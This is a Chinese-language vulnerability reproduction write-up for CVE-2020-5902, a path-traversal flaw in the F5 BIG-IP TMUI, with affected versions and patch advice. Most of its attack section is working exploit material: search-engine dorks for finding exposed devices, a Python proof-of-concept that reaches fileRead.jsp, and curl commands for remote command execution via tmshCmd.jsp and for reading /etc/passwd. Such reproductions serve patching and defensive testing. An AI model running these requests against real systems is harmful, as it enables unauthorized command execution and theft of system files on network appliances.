CVE-2020-5902 | F5 BIG-IP文件读取漏洞复现
漏洞复现|F5 BIG-IP TMUI(CVE-2020-5902)
0x1 漏洞介绍
F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。近日,F5官方公布流量管理用户界面(TMUI)使用程序的特定页面中存在一处远程代码执行漏洞(CVE-2020-5902)
0x2 影响版本
BIG-IP 15.x: 15.1.0/15.0.0
BIG-IP 14.x: 14.1.0 ~ 14.1.2
BIG-IP 13.x: 13.1.0 ~ 13.1.3
BIG-IP 12.x: 12.1.0 ~ 12.1.5
BIG-IP 11.x: 11.6.1 ~ 11.6.5
0x3 漏洞复现
搜索引擎
shodan
http.favicon.hash:-335242539
fofa
title="BIG-IP®- Redirect"
google
intitle:"BIG-IP" inurl:"tmui"
Python POC
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# F5 BIG-IP TMUI(CVE-2020-5902)远程命令执行,任意文件读取
import requests,os
requests.packages.urllib3.disable_warnings()
def poc(url):
pocName = os.path.basename(__file__)
if not url.startswith("http"):
url = "http://" + url
headers = {
"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.50",
"Accept": "*/*",
"Content-Type": "application/x-www-form-urlencoded",
"Accept-Encoding": "gzip,deflate",
}
payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"
res = requests.get(url+payload, headers=headers, verify=False)
if res.status_code == 200 and "BIG-IP release" in res.text:
return "[{}] => {} ".format(pocName, res.url)
if __name__ == '__main__':
print(poc("https://x.x.x.x/"))
RCE:
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Read File:
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
0x4 修复建议
通用修补建议:
升级到以下版本
BIG-IP 15.x: 15.1.0.4
BIG-IP 14.x: 14.1.2.6
BIG-IP 13.x: 13.1.3.4
BIG-IP 12.x: 12.1.5.2
BIG-IP 11.x: 11.6.5.2
参考:https://mp.weixin.qq.com/s/EehD7J0LEHX1AY2HTRtVgw
参考:https://cert.360.cn/warning/detail?id=a1768348bde7807647cbc7232edce7df